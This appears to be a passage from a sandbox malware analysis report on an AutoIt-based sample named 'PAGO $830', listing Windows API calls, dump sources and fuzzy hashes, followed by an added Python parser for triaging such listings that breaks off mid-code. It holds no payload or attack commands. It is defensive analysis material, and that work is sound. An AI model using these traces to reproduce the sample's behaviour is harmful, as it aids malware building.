                                                          • API String ID: 1413079979-0
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,00D93309,00D92F75), ref: 00D93320
                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D9332E
                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D93347
                                                          • SetLastError.KERNEL32(00000000,?,00D93309,00D92F75), ref: 00D93399
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastValue___vcrt_
                                                          • String ID:
                                                          • API String ID: 3852720340-0
                                                          • Opcode ID: 309dafc30b3bb5990428cfd7f5ea691083eb9552ec4a8fbe2614a80b9e61ce88
                                                          • Instruction ID: 9863a19a32b30ec678154d021ce539aee5af8bfe0d431d49972684a8a069548d
                                                          • Opcode Fuzzy Hash: 309dafc30b3bb5990428cfd7f5ea691083eb9552ec4a8fbe2614a80b9e61ce88
                                                          • Instruction Fuzzy Hash: 9801DF33A5C315FEEF2827B67C8DA2A2A94EB06B79B340329F014A51E1EF128D055674
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,00D94973,?,?,?,00D96502,?,?,?,?), ref: 00DA2D08
                                                          • _free.LIBCMT ref: 00DA2D3B
                                                          • _free.LIBCMT ref: 00DA2D63
                                                          • SetLastError.KERNEL32(00000000,?,?,?), ref: 00DA2D70
                                                          • SetLastError.KERNEL32(00000000,?,?,?), ref: 00DA2D7C
                                                          • _abort.LIBCMT ref: 00DA2D82
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$_free$_abort
                                                          • String ID:
                                                          • API String ID: 3160817290-0
                                                          • Opcode ID: c2e7a27023fd197bc9937efc166390ab436877f47c4f0abbe3a6616bb14e9631
                                                          • Instruction ID: 6f2fe07537a1156da49abdf99d9c1eaa1e5927f932f527f9e8d77c4ad644a336
                                                          • Opcode Fuzzy Hash: c2e7a27023fd197bc9937efc166390ab436877f47c4f0abbe3a6616bb14e9631
                                                          • Instruction Fuzzy Hash: 70F0CD315416016BCA21273FBC0AE3B2666EBC3760F354514F418B21D7EF69CD4742B1
                                                          APIs
                                                            • Part of subcall function 00D8AABF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00D8AB19
                                                            • Part of subcall function 00D8AABF: SelectObject.GDI32(?,00000000), ref: 00D8AB28
                                                            • Part of subcall function 00D8AABF: BeginPath.GDI32(?), ref: 00D8AB3F
                                                            • Part of subcall function 00D8AABF: SelectObject.GDI32(?,00000000), ref: 00D8AB68
                                                          • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00E08940
                                                          • LineTo.GDI32(?,00000003,00000000), ref: 00E08954
                                                          • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00E08962
                                                          • LineTo.GDI32(?,00000000,00000003), ref: 00E08972
                                                          • EndPath.GDI32(?), ref: 00E08982
                                                          • StrokePath.GDI32(?), ref: 00E08992
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                          • String ID:
                                                          • API String ID: 43455801-0
                                                          • Opcode ID: f528b506d35a259856282c2414fa9d8882af217534dc7f8004643de65e9450d1
                                                          • Instruction ID: 8b8a41c8933bf72436619080aa03661473b7fae662f232d7e307c79a75963055
                                                          • Opcode Fuzzy Hash: f528b506d35a259856282c2414fa9d8882af217534dc7f8004643de65e9450d1
                                                          • Instruction Fuzzy Hash: D711217604010CFFEF019F95DC88EAA7F6DEF08354F148151FA49A51A1C7729D99DBA0
                                                          APIs
                                                          • GetDC.USER32(00000000), ref: 00DD516E
                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 00DD517F
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DD5186
                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00DD518E
                                                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00DD51A5
                                                          • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00DD51B7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: CapsDevice$Release
                                                          • String ID:
                                                          • API String ID: 1035833867-0
                                                          • Opcode ID: 8c8eadc430e5b5939775c1f5f657a00c579103e4295a97b5ebbbd297011d815b
                                                          • Instruction ID: c92e2c6c60b59251451f9d630b64f987aa14eceb6d815acc3f9420adeeb76b18
                                                          • Opcode Fuzzy Hash: 8c8eadc430e5b5939775c1f5f657a00c579103e4295a97b5ebbbd297011d815b
                                                          • Instruction Fuzzy Hash: 62018FB5A40309BFEF109BB6AC49F5EBFB8EB48751F144066FA04A7281D6719C04CBA0
                                                          APIs
                                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00D734FF
                                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 00D73507
                                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00D73512
                                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00D7351D
                                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 00D73525
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D7352D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Virtual
                                                          • String ID:
                                                          • API String ID: 4278518827-0
                                                          • Opcode ID: fb948e3bd4dc8f7882a06467569511019070196d3e4cbbad260537aa08c0e2b8
                                                          • Instruction ID: 186161fa0bf59cbeb20d03ec47713659ff6616aa66dd90ab51f131fefe9f299a
                                                          • Opcode Fuzzy Hash: fb948e3bd4dc8f7882a06467569511019070196d3e4cbbad260537aa08c0e2b8
                                                          • Instruction Fuzzy Hash: 59016CB09027597DE3008F5A8C85B52FFA8FF19754F00411B915C47941C7F5A864CBE5
                                                          APIs
                                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00DDEA4E
                                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00DDEA64
                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 00DDEA73
                                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00DDEA82
                                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00DDEA8C
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00DDEA93
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                          • String ID:
                                                          • API String ID: 839392675-0
                                                          • Opcode ID: 9d33bc537327cc83fbb648707ca3a3c5b154b07fdc4233d6b06b98af64584fa1
                                                          • Instruction ID: 27de6c2a4b45bbcf84b96c82e7a695bb08f4e8e837fa132085a35af3805ebd4c
                                                          • Opcode Fuzzy Hash: 9d33bc537327cc83fbb648707ca3a3c5b154b07fdc4233d6b06b98af64584fa1
                                                          • Instruction Fuzzy Hash: 05F06D72101119BFE7201753AC0EEAB3A7CEBC6F11F104258F601E1090D6A21A4586B5
                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00DD17C3
                                                          • UnloadUserProfile.USERENV(?,?), ref: 00DD17CF
                                                          • CloseHandle.KERNEL32(?), ref: 00DD17D8
                                                          • CloseHandle.KERNEL32(?), ref: 00DD17E0
                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00DD17E9
                                                          • HeapFree.KERNEL32(00000000), ref: 00DD17F0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                          • String ID:
                                                          • API String ID: 146765662-0
                                                          • Opcode ID: 4d74473f25c741ef594a03df5092e970287469daea066ab8e8adeffd6d417b92
                                                          • Instruction ID: 939c2420b670f7145e9bce8417c36612156e2776e790794925175aef2253e055
                                                          • Opcode Fuzzy Hash: 4d74473f25c741ef594a03df5092e970287469daea066ab8e8adeffd6d417b92
                                                          • Instruction Fuzzy Hash: D9E0E536004106BFDB011FA2EC0C90ABF39FF49B22B208321F225A10B1CB3394A4DF90
                                                          APIs
                                                          • __Init_thread_footer.LIBCMT ref: 00D7D7B3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Init_thread_footer
                                                          • String ID: D%$D%$D%$D%
                                                          • API String ID: 1385522511-2722557190
                                                          • Opcode ID: 91efce27ce2d3b6355593e56c626c14b91d8126464bc300c92eec8ea1b7b9b77
                                                          • Instruction ID: 9edf095a0bfd32160c1972f1ca4ab58be16b6b8488fb0f18dbc847f1e5c9ab31
                                                          • Opcode Fuzzy Hash: 91efce27ce2d3b6355593e56c626c14b91d8126464bc300c92eec8ea1b7b9b77
                                                          • Instruction Fuzzy Hash: FA915D75A00206CFCB18CF59C0916ADB7F2FF59314B64855ED98AA7350E731E981CFA0
                                                          APIs
                                                            • Part of subcall function 00D78FA0: _wcslen.LIBCMT ref: 00D78FA5
                                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00DDC60C
                                                          • _wcslen.LIBCMT ref: 00DDC653
                                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00DDC6BA
                                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00DDC6E8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ItemMenu$Info_wcslen$Default
                                                          • String ID: 0
                                                          • API String ID: 1227352736-4108050209
                                                          • Opcode ID: ef5bcd54d88878456f13dbd4a742f7177bab2b82f07474b92dda37533c3a9ba4
                                                          • Instruction ID: 3cbc1998f7fee6908c9accf89e61a8fd5cb74d7b2c7fcb02296827581423173e
                                                          • Opcode Fuzzy Hash: ef5bcd54d88878456f13dbd4a742f7177bab2b82f07474b92dda37533c3a9ba4
                                                          • Instruction Fuzzy Hash: 2B51F4716243029BDB149F28C845B6B77E4EF89314F082A2EF995E32E1DB70D944CB72
                                                          APIs
                                                          • ShellExecuteExW.SHELL32(0000003C), ref: 00DFADCA
                                                            • Part of subcall function 00D78FA0: _wcslen.LIBCMT ref: 00D78FA5
                                                          • GetProcessId.KERNEL32(00000000), ref: 00DFAE5F
                                                          • CloseHandle.KERNEL32(00000000), ref: 00DFAE8E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: CloseExecuteHandleProcessShell_wcslen
                                                          • String ID: <$@
                                                          • API String ID: 146682121-1426351568
                                                          • Opcode ID: e5c4d200e77f515fe512a81ed56ee53f9f0f180bd5fed27c22f1bf2769a712c1
                                                          • Instruction ID: 96d3d83c1acbd8283aeaa45eca9976fd72ba51b79520f4a63e84f5b20bb74c51
                                                          • Opcode Fuzzy Hash: e5c4d200e77f515fe512a81ed56ee53f9f0f180bd5fed27c22f1bf2769a712c1
                                                          • Instruction Fuzzy Hash: D8714575A00219DFCB14DFA8C484AAEBBF0FF08314F05C499E959AB252DB75AD44CBB1
                                                          APIs
                                                          • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00DD715C
                                                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00DD7192
                                                          • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00DD71A3
                                                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00DD7225
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$AddressCreateInstanceProc
                                                          • String ID: DllGetClassObject
                                                          • API String ID: 753597075-1075368562
                                                          • Opcode ID: 40a043be5a64c8ef31dbbb6afda99f638d3dc97d8af9d98ad0a1ab96a3849890
                                                          • Instruction ID: 2fb14beba6b5ba82224c9f8a18a87fe4f6c9633610ab2f57d17be890148297d6
                                                          • Opcode Fuzzy Hash: 40a043be5a64c8ef31dbbb6afda99f638d3dc97d8af9d98ad0a1ab96a3849890
                                                          • Instruction Fuzzy Hash: 544169B1605244EFDF15CF64C884A9A7BB9EF44310B1491EEBD05AF206E7B1D944CBB0
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00E02EC0
                                                          • LoadLibraryW.KERNEL32(?), ref: 00E02EC7
                                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00E02EDC
                                                          • DestroyWindow.USER32(?), ref: 00E02EE4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$DestroyLibraryLoadWindow
                                                          • String ID: SysAnimate32
                                                          • API String ID: 3529120543-1011021900
                                                          • Opcode ID: 2ba8ea205f3257c643fabd890367ee33fad5784e16da615d5fed1467b7ac9973
                                                          • Instruction ID: a54b1f891269f26350ec190561e03a12a335c2adad9498db5f3d3727ae74c2f7
                                                          • Opcode Fuzzy Hash: 2ba8ea205f3257c643fabd890367ee33fad5784e16da615d5fed1467b7ac9973
                                                          • Instruction Fuzzy Hash: E7217C71250205AFEF118F64DC48EAB37E9EB59768F20622CFA50B61D0D6318C829760
                                                          APIs
                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00D94CAE,00000003,?,00D94C4E,00000003,00E388C8,0000000C,00D94DA5,00000003,00000002), ref: 00D94D1D
                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D94D30
                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,00D94CAE,00000003,?,00D94C4E,00000003,00E388C8,0000000C,00D94DA5,00000003,00000002,00000000), ref: 00D94D53
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: 4dbc46d1ab22caa336da186c29bd01caabfd683743ac13eef75acc9431091978
                                                          • Instruction ID: df57c05157ab7036d9a72a1341219cabe38da8ea9e901172283d4e892d5faf31
                                                          • Opcode Fuzzy Hash: 4dbc46d1ab22caa336da186c29bd01caabfd683743ac13eef75acc9431091978
                                                          • Instruction Fuzzy Hash: 88F0AF34A00208BFDB149F92DC09BADBFB4EF44751F1441A4F809B21A1DB719985CAA1
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D7687F,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D7683E
                                                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00D76850
                                                          • FreeLibrary.KERNEL32(00000000,?,?,00D7687F,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D76862
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Library$AddressFreeLoadProc
                                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                          • API String ID: 145871493-3689287502
                                                          • Opcode ID: 732393b19a5290d79ba03641ccace9634d48fcf13a0ab2d91d8a778a42796a1e
                                                          • Instruction ID: 36bef9bbb17fc9037ea24f3ba331e67b0be75ecc31dc0cd1b1fddd1afe442909
                                                          • Opcode Fuzzy Hash: 732393b19a5290d79ba03641ccace9634d48fcf13a0ab2d91d8a778a42796a1e
                                                          • Instruction Fuzzy Hash: CEE08632602B215BD21117266C08B5A6664DF82B13B194125F908F2181FB64CD4581B2
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00DB488B,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D76804
                                                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00D76816
                                                          • FreeLibrary.KERNEL32(00000000,?,?,00DB488B,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D76829
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Library$AddressFreeLoadProc
                                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                          • API String ID: 145871493-1355242751
                                                          • Opcode ID: cbc62f5f40918f3a5e90379d3acc40904c8cf9283a1bc2b038bda28017d7c4d5
                                                          • Instruction ID: 19c7364274ae61d68066da4c162d515cdc4c6bd6654e5c402a2750639a947948
                                                          • Opcode Fuzzy Hash: cbc62f5f40918f3a5e90379d3acc40904c8cf9283a1bc2b038bda28017d7c4d5
                                                          • Instruction Fuzzy Hash: CBD01232543A216FD2221B26AC1898E7E24DF8AB2131D4125B809B2194FF26CD49C6F2
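The two blocks above show the same call-site shape twice: LoadLibraryA on kernel32.dll, then GetProcAddress for a named export (Wow64DisableWow64FsRedirection, then Wow64RevertWow64FsRedirection), then FreeLibrary, with the literal `>>>AUTOIT NO CMDEXECUTE<<<` among the printed arguments. The following is an added example and is not part of the Joe Sandbox report or of the analysed sample: a parser for the per-function "APIs" and "Similarity" entries in this listing format, plus a triage pass that reports, per function, which exports are resolved at run time and whether the AutoIt marker string appears. It assumes the line layout as extracted here (bullet, `Api.MODULE(args), ref: <hex>`, and the `• <Field> ID:` lines); the embedded excerpt is constructed from two of the blocks in this section.

```python
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Constructed excerpt: two function blocks in the listing's layout, reduced to the lines the parser reads.
SAMPLE = """\
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D7687F,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D7683E
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00D76850
• FreeLibrary.KERNEL32(00000000,?,?,00D7687F,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D76862
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: Wow64DisableWow64FsRedirection$kernel32.dll
• Opcode ID: 732393b19a5290d79ba03641ccace9634d48fcf13a0ab2d91d8a778a42796a1e
APIs
• GetCurrentProcessId.KERNEL32 ref: 00DFA34E
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00DFA35C
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 00DFA38F
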